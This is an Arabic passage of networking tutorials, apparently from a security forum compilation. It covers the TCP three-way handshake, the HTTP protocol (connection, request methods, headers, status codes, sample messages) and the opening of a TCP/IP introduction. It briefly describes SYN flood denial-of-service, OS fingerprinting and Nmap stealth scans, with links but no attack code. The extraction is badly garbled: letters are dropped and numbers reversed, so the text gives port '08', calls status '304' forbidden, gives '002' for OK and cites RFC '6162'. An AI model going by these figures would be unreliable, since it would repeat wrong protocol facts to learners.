عندما يستلم ھذه رزمة ‪ SYN‬يعرف ان ھناك طلبا لنشاء‬ ‫اتصال جديد‪ ،‬ويقوم بحجز جزء من ذاكرتھا لتلك التصال ( ھجمات ‪ SYN flood‬‬ ‫??) ‪ ،‬ويخزن فیھا ‪ SIN‬للزبون وعنوان اليبي ورقم المنفذ في جھة الزبون‪ ‬‬ ‫(وعندما تصل زرم جديدة بعدھ ا يتم البحث في ذاكرة عن رقم اليبي والمنفذ‪ ‬‬ ‫للتعرف علي جزء الخاص من الذاكرة لتلك التصال )‪ .‬‬ ‫الخطوة القادمة في عملیة المصافحة‪ ،‬المزود تقوم بختیار رقم تسلسي الخاص‬ ‫له للرزمة التي ترسل جوابا للزبون‪ ،‬ويقوم بتحديد راية ‪ ACK‬وراية ‪ SYN‬ولذك‪ ‬‬ ‫تسمي رزمة ‪ .SYN/ACK‬‬ ‫ويستلم الزبون رزمة ‪ SYN/ACK‬من المزود وبذلك تتأكد من ان المزود موجود (‪ ‬‬ ‫عملیات ‪ ( .. ? stealth scan‬وبنفس الوقت تتأكد من رقم ‪ SIN‬التي أرسلھا الي‬ ‫المزود ويقوم ايضا بحفظ رقم ‪ SIN‬التي ارسلھا المزود ‪ ..‬‬ ‫الخطوة الخیرة في المصافحة علي الزبون ات تقوم بارسال رزمة ‪ ACK‬تحمل‪ ‬‬ ‫رقم ‪ SIN‬الي المزود ‪ ...‬وبھ ذا يتاكد المزود من أن الزبون تسلم رزمته ‪SYN/ACK‬‬ ‫‪ ..‬‬


‫والن بعدما استعرضنا ترويسة مقطع ‪ TCP‬وعملیة المصافحة‪ ،‬بقي أن نقول‪ ‬‬ ‫ھناك ھ جمات حجب الخدمة ضد المواقع تستغل ھذه المعلومات(‪ ‬‬ ‫‪(DoS,DDoS,DRDoS‬للمزيد راجع موقع ستیف جبسون ‪/http://www.grc.com‬‬ ‫‪ ،‬وھ ناك عملیات الكشف عن النظمة التي تعمل علیھا جھاز بعید‪ ،‬وھناك‪ ‬‬ ‫عملیات الفحص عن المنافذ‪ ،‬كلھا تستخدم ھذه المعلومات ‪ ....‬‬ ‫في عملیات الھجوم ‪ :‬مثل ھجمات ‪ SYN Flood‬الشھیرة‪ ،‬اول جیل ھجمات‪ ‬‬ ‫حجب الخدمة الموزعة ‪ DoS‬التي استغلت عملیة المصافحة الثلث في‪ ‬‬ ‫الھ جوم‪ ،‬بحیث بعد الخطوة الثانیة يقطع العملیة وينشيء اتصال آخر ويكرر‪ ‬‬ ‫وھكذا يستھ لك الموارد المخصصة او يستھلك جھد ‪ CPU‬لدي المزود ويضعه في‬ ‫وضع خارج عن الخدمة( معظم انظمة التشغیل أصلحت ھذه المشكلة بتعديل‪ ‬‬ ‫في المكدس ) حديثا ھذا النوع من الھ جوم مع وضع عنوان ايبي مزيف للرزم‪ ‬‬ ‫مما يصعب عملیة التعقب‪ ..‬للمزيد راجع مجلة‪ ‬‬ ‫‪ 57‬‬ ‫‪ /http://www.phrack.org‬وموقع ‪ ، /http://www.grc.com‬وھذان مقالن‪ ‬‬ ‫بالعربیة ‪ http://www.arabteam2000.com/forum/Details.asp?Id =731‬و‪ ‬‬ ‫‪ 82881=http://www.kwakeb.net/cgi­bin/eBoards/showpost.pl?pid‬‬ ‫في عملیات الكشف عن النظمة ‪ OSFingerPrint‬ھناك برامج فحص شھیرة‪ ‬‬ ‫مثل ‪ Nmap‬تعتمد في الكشف علي انشاء رزم بحقول ورايات معینة وثم تحلل‪ ‬‬ ‫الرزمة المستقبلة وبعد تحلیلھ ا تستطیع الكشف عن النظام في الطرف الخر‪ ‬‬ ‫طبقا لبعض الحقول والرايات في الرزمة المرسلة جوابا ‪ ..‬‬ ‫في عملیات الفحص أيضا ‪ Nmap‬وغیرھ ا تعمد إلي إرسال رزم بحقل‪/‬راية معینة‬ ‫ثم تحلل الرزمة المرسلة جوابا وتكتشف ماذا كان منفذ ما مفتوحا‪ ،‬واما اذا كان‬ ‫الموقع الھ دف حیا الخ من تلك النواع ‪ ... Stealth/null scan‬‬ ‫للتفصیل في ھ اتین العملیتین يمكنك مراجعة ما كتبه صاحب ‪ Nmap‬‬ ‫‪ http://www.insecure.com/nmap/nmap­fingerprinting­article.html‬‬ ‫وإلي اللقاء في الجزء القادم ‪ ...‬أي استفسار او استزادة او مناقشة يمكنك‪ ‬‬ ‫زيارتنا في ‪ /http://www.arabteam2000.com‬قسم أمن نظم المعلومات‪ ‬‬ ‫‪ 67‬‬ ‫ماھو‪ HTTP‬‬ ‫للكاتب‪ SaD.jAcKAl:‬‬ ‫‪ : HTTP‬البروتوكول الساسي لشبكة ويب العالمیة ‪ ..‬‬ ‫تعتمد شبكة إنترنت في عملھ ا علي مجموعة من بروتوكولت قیاسیة‪ ‬‬ ‫تستخدمھ ا الحواسیب لتبادل البیانات ‪ .‬ولم يكن ممكنا لشبكة إنترنت أو لي‪ ‬‬ ‫شبكة أخري ان تنشأ من دون ھذه البروتوكولت‪ ،‬وعلي الرغم من أن بروتوكول‪ ‬‬ ‫‪ TCP/IP‬يعتبر البروتوكول الساسي لشبكة إنترنت إل أن عملیات التحكم بكل‪ ‬‬ ‫وظیفة من الوظائف تتم عادة عن طريق بروتوكولت تتوضع فوق بروتوكول‪ ‬‬ ‫‪ ،TCP/IP‬وعندما تكون المور سائرة علي ما يرام‪ ،‬فاننا ل نشعر عادة بھذه‪ ‬‬ ‫البروتوكولت‪ ،‬إل انھا تظھ ر امامنا باستمرار‪ ،‬عند تركیب أدوات ‪ Tools‬جديدة‪ ،‬أو‪ ‬‬ ‫تنفیذ وظائف معینة‪ ،‬ويعتمد البريد اللكتروني علي البروتوكولت البسیط لنقل‪ ‬‬ ‫البريد ‪ ،SMTP‬وعلي بروتوكول مركز البريد ‪ POP‬وتعمل قارئات الخبار ‪ News‬‬ ‫‪ Readers‬عن طريق بروتوكول نقل الخبار عبر الشبكة ‪ ،NNTP‬ويعتمد جلب‪ ‬‬ ‫الملفات عادة علي بروتوكول نقل الملفات ‪ ،FTP‬ويكمن جزء من سحر شبكة‪ ‬‬ ‫الويب العالمیة ‪ Wide We WWW (World‬في انھ ا بیئة متعددة البروتوكولت‪ ‬‬ ‫وھ ذا ما يمكننا من الوصول الي لوائح خدمة ‪ Ghoper‬ومواقع ‪ FTP‬وخدمات‪ ‬‬ ‫انترنت الخري‪ ،‬من خلل متصفحات شبكة ويب ‪ ... Web Browser‬‬ ‫وعلي الرغم من أن شبكة الويب تسمح بالعديد من البروتوكولت‪ ،‬ال انھا‪ ‬‬ ‫تحتوي علي بروتوكول اساسي يسمي "بروتوكول نقل النص المتشعب" ‪HTTP‬‬ ‫‪ . (Protocol (HyperText Transfer‬ويتحكم بروتوكول ‪ HTTP‬بعملیات استردات‪ ‬‬ ‫الوثائق علي شبكة الويب ‪ Web‬التي تقوم بھا برامج المتصحفات ‪ ،Browser‬كما‬ ‫يتحكم بالتفاعلت التي تتم عبر شبكة ويب‪ ،‬من خلل مزايا معینة‪ ،‬مثل‪ ‬‬


‫الستمارات ‪ ،Forms‬ولقد تم اعتماد الصدارة رقم ‪ 1.1‬المعتمد كمواصفات‪ ‬‬ ‫قیاسیة من قبل فريق عمل ھندسة النترنت ‪ IETF(nternet Engeneering‬‬ ‫‪ (Force Task‬بعد أن تبنتھا معظم المتصحفات الحديثة ‪ .‬‬ ‫ينطلق بروتوكول ‪ HTTP‬في عمله كلما نقرنا علي وصلة تشعبیة ‪ Hyperlink‬‬ ‫‪ 77‬‬ ‫يبدا "محدد مكان مورد المعلومات الموحد" ‪ (URL)Uniform Resource Locator‬‬ ‫فیھا بالرموز ‪ ،//:Http‬او كلما كتبنا ‪ URL‬يبدا بھذه الرموز ‪ .‬وتوفر معظم‪ ‬‬ ‫المتصحفات الحديثة مثل ‪ Navigator Netscape‬و ‪Microsoft Internet Explorer‬‬ ‫علیك عناء كتابة ھذه الروموز عن طريق اضافتھا آلیا الي عناوي ‪ URL‬التي‪ ‬‬ ‫تطلبھ ا ( باستثناء تلك التي تبدا عنواوينھا بالرموز ‪ FTP‬او ‪ . ( Ghoper‬ويبدا‪ ‬‬ ‫بروتوكول ‪ HTTP‬فور تشغیله بتنفیذ سسلة من العملیات‪ ،‬رباعیة الجزاء‪ ،‬‬ ‫ومؤلفة من المراحل التالیة ‪ :‬مرحلة الربط (‪ ،(Connection‬مرحلة الطلب‪ ‬‬ ‫( ‪ ،(request‬ومرحلة الستجابة ( ‪ ،(Response‬ومرحلة الفصل (‪،(Disconnection‬‬ ‫أو الغلق (‪ .(Cloes‬وقد توسعت مزايا بروتوكول ‪ HTTP‬منذ ظھورھا الول عام‪ ‬‬ ‫‪ 1991‬ال ان ھذه المراحل الربع ل تزال تشكل جوھر عملھا‪ .‬وتمكن معظم‪ ‬‬ ‫المتصحفات الحديثة من متابعة ھذه المراحل اثناء تنفیذھا عنن طريق مراقبة‪ ‬‬ ‫شريط الحالة ( ‪ . (Status Bar‬‬ ‫ونظرا لن بروتوكول ‪ HTTP‬يعتبر من البروتوكولت التي تعتمد علي مبدا الطلب‪ ‬‬ ‫والستجابة فھو يتطلب وجود مزود ‪ server‬وزبون ‪ ، Client‬لنھاء عملیة التبادل ‪.‬‬ ‫وساھمت شبكة الويب في انتشار مفھ وم المزود بحیث نشات إلفة بین معظم‪ ‬‬ ‫مستخدمي انترنت وبرمجیات مزود الويب ‪ .‬ويمكن تعريف المزودات علي انھا‪ ‬‬ ‫حواسیب تحتغظ بالمعلومات لتزود بھا الزبون ‪ clinet‬الذي يطلبھا ‪ .‬ويعتبر‪ ‬‬ ‫مصطلح الزبون ‪ Clinet‬اقل انتشارا علي شبكة الويب لن مفھوم المتصفح‪ ‬‬ ‫‪ Browser‬قد حل محله ‪ .‬وتعتبر متصفحات الويب زبائن بروتوكول ‪ ،HTTP‬تتالف‪ ‬‬ ‫من البرمجیات التي ترسل الطلبات وتستقبل الستجابات‪ ،‬ويمكن ان ننظر الي‪ ‬‬ ‫تبادلت بروتوكول ‪ HTTP‬علي انھا رسالة آسكي ‪ ASCII‬مرسلة من قبل الزبون‪ ‬‬ ‫واستجابة لتلك الرسالة من قبل المزود‪ ،‬ويمكن الفارق بین رسالة الطلب‪ ‬‬ ‫والستجابة في مضمون الرسالة بحد ذاته ‪ ....‬‬ ‫مرحلة الرط ومرحلة الفصل ‪ :‬‬ ‫سوف نعرض الي مرحلتین ‪ :‬الولي والخیرة‪ ،‬من تبادلت ‪ HTTP‬بشكل سريع‪ ‬‬ ‫نظرا لنھ ا اقل المراحل الربع تشويقا‪ ،‬ففي مرحلة الربط ‪ Connection‬يسعي‪ ‬‬ ‫الزبون ( المتصفح) الي اقامة علقة ربط مع المزود ( الحاسوب البعید )‪ ،‬وينظر‪ ‬‬ ‫الزبون الي اسم النطاق ( ‪ ( Domain Name‬او الي رقم بروتوكول انترنت ( ‪ IP‬‬ ‫‪ ( Number‬الموجود ضمن مستطیل "محدد مكان مورد المعلومات الموحد" ‪URL‬‬ ‫سعیا للتصال مع المزود‪ ،‬ويحاول بروتوكول ‪ HTTP‬ان يستخدم البوابة ‪ Port‬رقم‪ ‬‬ ‫‪ 08‬علي المزود‪ ،‬لتمام عملیة مرحلة الربط ( ما عدا في الحالت التي يشیر‪ ‬‬ ‫فیھا ‪ URL‬الي بوابة اخري ) ‪ .‬اما عن مرحلة الفصل او الغلق فتتم في نھاية‪ ‬‬ ‫‪ 87‬‬ ‫تبادلت ‪ ، HTTP‬وتبدا ھ ذه العملیة بايعاز من الزبون‪ ،‬فور النتھاء من نقل الملف‬ ‫المعني‪ ،‬أو بايعاز من الزبون اذا نفذ المزود المستخد امر الوقوف ‪ ،Stop‬أو اذا‪ ‬‬ ‫نفذ تبادل جديدا من نوع ‪ HTTP‬عن طريق الضغط علي نص تشعبي جديد‪ ،‬او‪ ‬‬ ‫اذا استخدم احد ازرار التراجع ‪ Back‬أو التقدم ‪ Forward‬في المتفصح‪ ،‬او اذا‪ ‬‬ ‫انتقي موضوعا جديدا من قائمة المواقع السابقة‪ ،‬في ھذا المتصفح ‪ .‬ويتطلب‪ ‬‬ ‫كل واحد من الموضوعات التي تظھر علي صفحة الويب عملیة ربط مستقلة‪ ‬‬ ‫لتبدا بنقل المعلومات‪ .‬ال ان الصدارة ‪1.1 HTTP‬تتضمن نوعا من الربط المتواصل‬ ‫‪ Persistent connection‬يسمي "البقاء حیا" ‪ Keep Alive‬يمكنه جلب ملفات‪ ‬‬ ‫متعددة ( مثل ملفات الرسومات) من خلل عملیة ربط واحدة فقط ‪ .‬‬ ‫مرحلة الطلب ‪ :‬‬ ‫تبدا مرحلة الطلب فور انتھ اء مرحلة الربط‪ ،‬ويقوم الزبون في ھذه المرحلة‪ ‬‬ ‫بتقديم طلبه ‪ request‬الي المزود عن طريق ارسال رسالة اسكي باسطر‪ ‬‬


‫وحقول معینة وتحتوي الرسالة في أعلھا ‪ ،‬علي سطر الطلب ‪ request line‬‬ ‫متبوعا بثلثة سطور للترويسات ‪ :‬الترويسة العامة ‪ Genereal Header‬وترويسة‬ ‫الطلب ‪ Request Header‬وترويسة الكائن ‪ ،Header Entity‬ويقصد بالكائن‪ ‬‬ ‫المعلومات او الملفات التي ترغب في ارسالھا من متصفحك الي الحاسوب‪ ‬‬ ‫المزود‪ ،‬ويجد علي السطر التالي الترويسة الخیرة حقل يسمي جسم الكائن‪ ‬‬ ‫او ‪ ، Entity Body‬وسنلقي فیما يلي نظرة علي كل سطر وحقل ‪ .....‬‬ ‫يضم سطر الطلب ‪ Request Line‬في رسالة بروتوكول ‪ HTTP‬عددا من‪ ‬‬ ‫التفصیلت‪ ،‬بما فیھا الطريقة المتعبة ‪ ،Method‬ومعرف مكان مورد المعلومات‪ ‬‬ ‫الموحد ‪ ( Identifier URI (Uniform Resource‬واصدارة البروتوكول‪ .‬ونلقي قبل‪ ‬‬ ‫الحديث عن الطريقة المتعبة‪ ،‬نظرة سريعة علي التفصیلت الخري ‪ .‬يتالف‪ ‬‬ ‫معرف مكان مورد المعلومات الموحد ‪ URI‬عادة اما من "محدد مكان مورد‪ ‬‬ ‫المعلومات الموحد" ‪ URL‬او من " اسم مكان مورد المعلومات الوحد" ‪ URN‬‬ ‫( ‪ ،( Uniform Resource Name‬وتكمن مھمته في الشارة الي ملف او مورد‪ ‬‬ ‫اخري‪ ،‬من موارد الشبكة‪ ،‬اما اصدارة البروتوكول فھي كما يتضح من اسمھا‪ ،‬‬ ‫تحدد بروتوكول ‪ HTTP‬المطلوب ‪ .‬ويحتوي الطلب بعد ھذه المواصفات علي نوع‪ ‬‬ ‫من الرسائل‪ ،‬يتضمن مختلف المعدلت ‪ Modifiesrs‬والتفصیلت الخري ووفیما‪ ‬‬ ‫يلي توضیح بسیط ‪ :‬‬ ‫‪ REQUEST SYNTAX‬الصیغة‪ ‬‬ ‫‪ ><crlf> "HTTP/1.1"<URL><METHOD‬‬ ‫‪ 97‬‬ ‫‪ }>*{<crlf><Value>:<Header‬‬ ‫‪ ><crlf‬‬ ‫‪ EXMAPLE‬المثال‪ ‬‬ ‫‪ 1.1/GET /index.htm HTTP‬‬ ‫‪ Accept: text/plain‬‬ ‫‪ Accept: text/plain‬‬ ‫‪ */* :Accept‬‬ ‫‪ User­Agent: Browser‬‬ ‫يتضمن سطر الطلب في بروتوكول ‪ HTTP‬تحديد الطريقة المتبعة‪ ،‬اكثر الطرق‪ ‬‬ ‫انتشارا ھي طريقة ‪ Get‬و طريقة ‪ Head‬وطريقة ‪ .Post‬وفیما تتضمن الطرق‪ ‬‬ ‫الخري طريقة ‪ Put‬وطريقة ‪ ،Delete‬وتتالف طريقة ‪ Get‬الكثر انتشارا علي‪ ‬‬ ‫الطلق من تعلیمة تطلب من المزود ارسال وثیقة او كائن الي الزبون ‪ .‬وحیث‪ ‬‬ ‫استخدام طلب ‪ Get‬فان متصحف الويب يقول "ارسل لي الملف الموجود عند‪ ‬‬ ‫عنوان ‪ URL‬المعن‪ ،‬بحیث استطیع عرض محتوياته علي المستخدم"‪ ،‬ويمكن‪ ‬‬ ‫تعديل طريقة ‪ Get‬باستخدام عبارات شرطیة لطلب الملفات التي لھا تاريخ‪ ‬‬ ‫معین‪ ،‬او عدلت بتاريخ معین‪ ،‬او تقع ضمن فئة ما‪ ،‬اما المحتويات نفسھا فھي‪ ‬‬ ‫محددة في حقل ‪ Body Entity‬من الطلب‪ ،‬ويتمثل اختلف طريقة ‪ Get‬عن‪ ‬‬ ‫طريقة ‪ Head‬فیما يلي‪ :‬يرسل المزود في طريقة ‪ Head‬كل شيء الي الزبون‪ ‬‬ ‫باستثناء حقل ‪ ، Entity Body‬او بشكل ابسط فھو يرسل معلومات عن الملف‪ ‬‬ ‫ولیس الملف ذاته‪ ،‬ويمكن استخدام طريقة ‪ Head‬لتحديد فیما اذا كان الربط‪ ‬‬ ‫المتشعب شرعیا ام ل‪ ،‬ونشیر ھ نا الي ان برنامج تتبع تحديث العلمات‪ ‬‬ ‫المرجعیة ‪ ،Bookmarks‬تعتبر مثال علي البرامج التي تستخدم طلبات ‪ Head‬‬ ‫‪ ....‬‬ ‫يزداد استخدام طريقة ‪ Post‬باطراد علي شبكة الويب‪ ،‬واذا سبق لك ان أنشات‪ ‬‬ ‫استمارات ‪ ،HTML Forms‬فانك تعرف حكما طريقة ‪ ،Post‬لن ھذه الطريقة تحدد‬ ‫ماذا يحدث للمعلومات المسلمة عبر الستمارات‪ .‬وتطلب طريقة ‪ Post‬بشكل‪ ‬‬ ‫اساسي من المزود ان يقبل المعلومات المرفقة‪ ،‬كمعلومات مضافة معرفة ‪ URI‬‬ ‫معین‪ ،‬وتستخدم طريقة ‪ ،Post‬علي سبیل المثال‪ ،‬لوضع رسالة او تعلیق ضمن‬ ‫مساحات علي المزود تخصصھا بعض مواقع الويب لھذا الغرض‪ ،‬ولضافة‪ ‬‬ ‫معلومات لقواعد البیانات‪ ،‬ولرسال البیانات من استمارة ويب الي المزود‪ .‬اما ما‬


‫يحدث لتلك البیانات فیعتمد علي المزود ذاته‪ ،‬حیث يمكن ان ترسل الي قاعدة‪ ‬‬ ‫‪ 08‬‬ ‫بیانات من خلل نص ‪ ،CGI Commom Getway Interface‬أو يمكن ان تضاف‪ ‬‬ ‫علي ھ یئة محددة بشكل مسبق الي وثیقة ‪ ،HTML‬لیتمكن الخرون من‪ ‬‬ ‫مشاھدتھا‪ ،‬ال ان ھ ذا المر ل يدخل في نطاق تبادلت بروتوكول ‪ .HTTP‬‬ ‫تعتبر طريقة ‪ Put‬مشابھة لطريقة ‪ ،Post‬فھ ي تطلب من المزود تخزين‪ ‬‬ ‫المعلومات المرفقة كملف ( كمورد) مسمي من قبل معرف ‪ URI‬في الطلب‪ ،‬‬ ‫واذا كان ھ ذا الملف غیر منشا‪ ،‬ينشئ المزود ملفا جديدا‪ ،‬اما اذا كان الملف‪ ‬‬ ‫منشأ‪ ،‬فیكتب علیه من جديد ‪ .‬ويكمن الفارق الرئیسي بین طريقة ‪ Post‬‬ ‫وطريقة ‪ Put‬في أن معرف ‪ URI‬في طريقة ‪ Post‬يقوم بتسمیة المورد الذي‪ ‬‬ ‫سوف يھتم بالبیانات الموجودة في رسالة ‪ .HTTP‬اما ما يحدث لھا بعد ذلك‪ ‬‬ ‫فیحدده المزود‪ ،‬وقد يؤدي ھ ذا المر‪ ،‬في الواقع الي تعديل مورد مختلف كلیا‪ ،‬‬ ‫عن المورد الذي يحدده معرف ‪ ، URI‬اما في طريقة ‪ Put‬فإن معرف ‪ URI‬علي‪ ‬‬ ‫عكس ما ذكرنا‪ ،‬يشیر الي المعلومات المرفقة‪ ،‬ولیس علي مورد علي المزود‪ ،‬‬ ‫ول يمكن للمزود ان يفعل شیئا بالمعلومات سوي تخزينھا ‪ ..‬‬ ‫تعتبر طريقة ‪ Put‬اسھل ھ اتین الطريقتین‪ ،‬إل انھا اقل استخداما ايضا‪ ،‬والسبب‪ ‬‬ ‫ھ و ان المشرفین علي المزودات يرغبون لسباب مفھومة في التحكم بوجھة‪ ‬‬ ‫المعلومات‪ .‬تستخدم طريقة ‪ Delete‬للسبب ذاته‪ ،‬بشكل قلیل نسبیا باستثناء‪ ‬‬ ‫استخدامات المشرفین علي المزودات‪ .‬وتطلب طريقة ‪ Delete‬من المزود ان‪ ‬‬ ‫يتخلص من المورد المحدد في سطر معرف ‪ ،URI‬لكن من غیر المفضل ان‪ ‬‬ ‫تسمح بانجاز ھ ذا العمل الخطر عم طريق بضع نقرات علي الوصلت المتشعبة‪،‬‬ ‫ولھ ذا السبب يتم اعداد المزودات بحیث تسمح باستخدام طرق معینة فقط ‪ .‬‬ ‫قد تحتوي اسطر ترويسة الطلب ‪ Request Line‬من رسالة بروتوكول ‪ HTTP‬‬ ‫علي عدة حقول مختلفة مختلفة‪ .‬وتحدد ترويسة ‪ Accept‬نوع الوسط‪ ،‬مثل‪ ‬‬ ‫ملفات الفیديو والصوت الذي يمكن ان يحتويه الستجابة‪ ،‬علي حین أن حقل‪ ‬‬ ‫‪ Accept­Encoding‬يحدد ان مجموعة الرموز المقبولة أو تقنیات الترمیز المقبولة‪ ‬‬ ‫للستجابة ‪ .‬وتغطي ترويسة التفويض ‪ Autorization header‬التفويضات‪ ‬‬ ‫المسموحة بین المتصفح والمزود ‪ .‬فیما تحتوي ترويسة ‪ Cashe­Control‬‬ ‫‪ header‬علي زمرة معقدة من موجھات ‪ Directives‬الكاش‪ .‬‬ ‫ويتعامل بروتوكول ‪1.1 HTTP‬بشكل مكثف مع التحكم بالكاش والذي اصبح‪ ‬‬ ‫مجال ھ اما في تصمیم وادارة شبكة الويب‪ ،‬خلل السنة الماضیة ‪ .‬وتوجد‪ ‬‬ ‫ترويسات اخري تسمح لتحديد مواصفات الموقع ونوع المحتويات والتواريخ‪ ‬‬ ‫وتفصیلت تعديل المورد‪ ،‬وتفصیلت عن البروكسي وحتي معلومات حول‪ ‬‬ ‫المتصفح ‪ User­Agent‬الذي يقوم بالطلب ‪ .‬ومن المتوقع ان يزداد دور ھذه‪ ‬‬ ‫‪ 18‬‬ ‫الترويسات بشكل اكبر مع ازدياد تعقیدات شبكة الويب وزيادة تنوع التبادلت‪ ‬‬ ‫الداخلیة‪ ،‬وتكامل مختلف النواع الجديدة من الوساط والمزايا ‪ ...‬‬ ‫الستجابة ‪ :‬‬ ‫بعد ان ينتھ ي المتصفح من انشاء الربط مع المزود‪ ،‬وارسال طلبه ينتظر رسالة‪ ‬‬ ‫الستجابة وتتالف رسالة الستجابة كما ھو الحال في رسالة الطلب من عدة‪ ‬‬ ‫سطور من المعلومات ويقع في بدايتھا سطر الوضعیة ‪ ،status line‬متبوعا‪ ‬‬ ‫بمجموعة متنوعة من ترويسات الستجابة ثم بالوثیقة او المورد المطلوب‪ ‬‬ ‫وتستغرق الستجابة في معظم الحیان‪ ،‬زمنا اطول لتنفیذھا بالمقارنة مع زمن‬ ‫الطلب‪ ،‬وذلك بسبب احتوائھا علي الملف او المورد المطلوب‪ ،،‬ويعتبر ھذا المر‬ ‫معكوسا في طلبات ‪ Post‬و ‪ Put‬ولكن معظم رسائل ‪ HTTP‬الن ھي طلبات‪ ‬‬ ‫‪ Get‬بسیطة جدا‪ ...‬‬ ‫يحتوي سطر الوضعیة من الستجابة علي رقم إصدارة ‪ ،HTTP‬وشیفرة الوضعیة‬ ‫وعبارة الستجابة‪ ،‬وتتالف شیفیرات الوضعیة ‪ status codes‬من مؤشرات ثلثیة‪ ‬‬ ‫الرقام تدل علي الطريقة التي تم فیھا معالجة الطلب‪ ،‬لكن عبارة السبب‪ ‬‬ ‫‪ Reason Phrase‬قصیرة‪ ،‬وتحتوي علي شرح للشیفرة ‪ ،Code‬باللغة النجلیزية‪ ‬‬


‫العادية‪ .‬ويوجد خمسة تصنیفات لشیفرات الوضعیة ‪ ...‬‬ ‫‪1 xx‬وتخصص لتفصايل المعلومات‪ ‬‬ ‫‪2 xx‬وتشیر الي نجاح العملیة‪ ‬‬ ‫‪3 xx‬وتعلمنا بانتھاء نقل معرف ال ‪ URI‬‬ ‫‪4 xx‬وتیشر الي خطأ من جانب المتصفح‪ ‬‬ ‫‪ 5 xx‬وتوضح أن المزود يعاني من مشاكل ‪ ...‬‬ ‫ول بد اننا شاھدنا بعضا من ھذه الشیفرات مثل ‪ 304‬التي تعني ممنوع‪ ‬‬ ‫الوصول‪ ،‬و ‪ 104‬التي تعني غیر شرعي ‪ .‬وتشیر الشیفرات الخري الي عدم‪ ‬‬ ‫سماح بطريقة طلب معینة ‪ ،504‬والي عدم توفر الخدمة ‪ ،305‬والي عدم دعم‪ ‬‬ ‫الوسط ‪ 514‬الخ ‪ ..‬وتعتبر شیفرة الوضعیة في الواقع استجابة مباشرة لمعالجة‪ ‬‬ ‫معلومات الطلب‪ ،‬ولكن أكثر شیفرات الوضعیة انتشارا ھي غیر مرئیة‪ ،‬ھي ‪002‬‬ ‫تعني ‪ ، OK‬ال ان المتصفح ل يعرضھا بل يعرض عوضا عنھا الملف المطلوب‪ ‬‬ ‫الذي قام بجلبھ ا ‪ ،‬وفیما يلي شیفرة استجابة بسیطة‪ ‬‬ ‫اول الصیغة‪ ‬‬ ‫‪ RESONSE SYNTAX‬‬ ‫‪ "0.1/<crlf>[<message>]<result­code> "HTTP‬‬ ‫‪ 28‬‬ ‫‪ }>*<crlf><Value>:<Header‬‬ ‫‪ ><crlf‬‬ ‫‪ EXAMLE‬المثال‪ ‬‬ ‫‪ HTTP/1.1 200 OK‬‬ ‫‪ 1.0/Server:MDMA‬‬ ‫‪ 0.1:MIME­Version‬‬ ‫‪ Content­type: text/html‬‬ ‫‪ 9991 33:52:00 7 Last­modified:Thu Jul‬‬ ‫‪ 3002:Content­Length‬‬ ‫‪ ><title/> MDMA­Multithreaded Daemon for Multimedia Access <title‬‬ ‫‪ ..‬‬ ‫‪ ..‬المحتويات الخري للملف‪ ‬‬ ‫‪ ][Connection cloes by foruign host‬‬ ‫كما ھو الحال في رسالة الطلب‪ ،‬فان رسالة الستجابة يمكنھا ان تحتوي علي‪ ‬‬ ‫حقول ترويسات‪ ،‬وتبلغ ھ ذه الحقول برمجیات الزبون‪ ،‬بالطرق المسموحة‪ ،‬‬ ‫وتزودنا بمعلومات عن محتويات الرسالة ( مثل لغة المحتويات‪ ،‬وطول المحتويات‪،‬‬ ‫ونوع المحتويات )‪ ،‬وتعطي تفاصیل عن تواريخ التعديلت الخ ‪ ...‬وتساعد ھذه‪ ‬‬ ‫الترويسة المتصفح بتفسیر الملف او المورد بشكل صحیح‪ ،‬بحیث يتمكن‪ ‬‬ ‫المتصفح من عرضھا بشكل صحیح ‪ ...‬‬ ‫المزيد من ‪ : HTTP‬‬ ‫يضاف بشكل دائم المزيد من الخیارات الي بروتوكول ‪ ،HTTP‬لتغطیة تبادلت‪ ‬‬ ‫مثل نصوص ‪ ,CGI‬والشؤون المنیة‪ ،‬فیضیف ‪ Secure­HTTP‬مثل آلیا تسمح‪ ‬‬ ‫بالتوقیع الرقمي والمزايا المنیة الخري ( لمزيد من المعلومات انظر في الموقع‪ ‬‬ ‫‪ ­www.commerce.net.8000/cgi‬‬ ‫‪ bin/texit?/information/standards/drafts/shttp.txt‬‬ ‫وستستمر عملیات الضافة علي بروتوكول ‪ HTTP‬الساسي مع ازدياد الحاجة‪ ‬‬ ‫الي تبادلت اكثر تعقیدا‪ ،‬ومن المفید ان نلقي نظرة علي موقع ‪ 3W‬‬ ‫‪ Organization Web www.w3.org‬لمعرفة آخر التطورات في ھذا المجال‪ ‬‬ ‫والي وثیقة ‪ RFC‬رقم ‪ 6162‬الخاص ببرتوكول ‪ ...HTTP‬‬ ‫‪ http://rfc.net/rfc2616.html‬‬ ‫‪ 38‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الول)‪ ‬‬ ‫للكاتب‪ AgainstISR&USA :‬‬


‫تعريـــف عـام بال ‪ TCP/IP‬‬ ‫محتويات الدرس‪ :‬‬ ‫‪ -1‬ما ھو ال‪ tcp ip‬‬ ‫‪ -2‬ممیزات ال‪ tcp ip‬‬ ‫‪ -3‬اصل النترنت‪ ‬‬ ‫‪ -4‬میلد ال‪ tcp ip‬‬ ‫‪ -5‬اھداف تصمیم ال ‪ tcp ip‬‬ ‫‪ -6‬حركة البیانات عبر الشبكة‪ ‬‬ ‫‪ -7‬لماذا نستخدم ال ‪ tcp ip‬‬ ‫الدرس الول‪ ‬‬ ‫تعريف عام بال ‪ TCP/IP‬‬ ‫يمكن لثنان من البشر ان يتصلوا ببعضھم عملیا عندما يوافقوا علي استخدام‪ ‬‬ ‫لغة محددة‪ .‬يمكن ان يتحدثوا العربیة‪ ,‬النجلیزية ‪,‬السبانیة ‪,‬الفرنسیة او اي لغة‬ ‫اخري ولكن يجب ان يستخدموا نفس اللغة‪ .‬‬ ‫اجھ زة الكمبیوتر تعمل بنفس الطريقة ‪ . Transmission Control Protocol‬‬ ‫(‪/Internet Protocol (TCP/IP‬ھ و اختصار المصطلح ‪ .‬يمثل لغة تتحدث بھا‪ ‬‬ ‫اجھزة الكمبیوتر‪ .‬‬ ‫‪TCP/ IP‬ھو مجموعة من القواعد التي ًعرف كیف يتراسل اي كمبیوتران مع‪ ‬‬ ‫ت‪ ‬‬ ‫بعضھما ويتراسلن البیانات مع بعضھما ‪ .‬‬ ‫مجموعة القواعد ھذه تسمي ال بروتوكول ‪ .‬‬ ‫مجموعة البروتوكولت التي جمعت مع بعضھا البعض تشكل ‪ Protocol suite‬او‪ ‬‬ ‫‪Protocol stack‬ويعملون سويا فیما يسمي ‪ Protocol stack‬او حزمة البروتوكول‬ ‫‪ .‬‬ ‫‪ 48‬‬ ‫‪ TCP/ IP‬يعتبر من البروتوكولت القوية ‪ 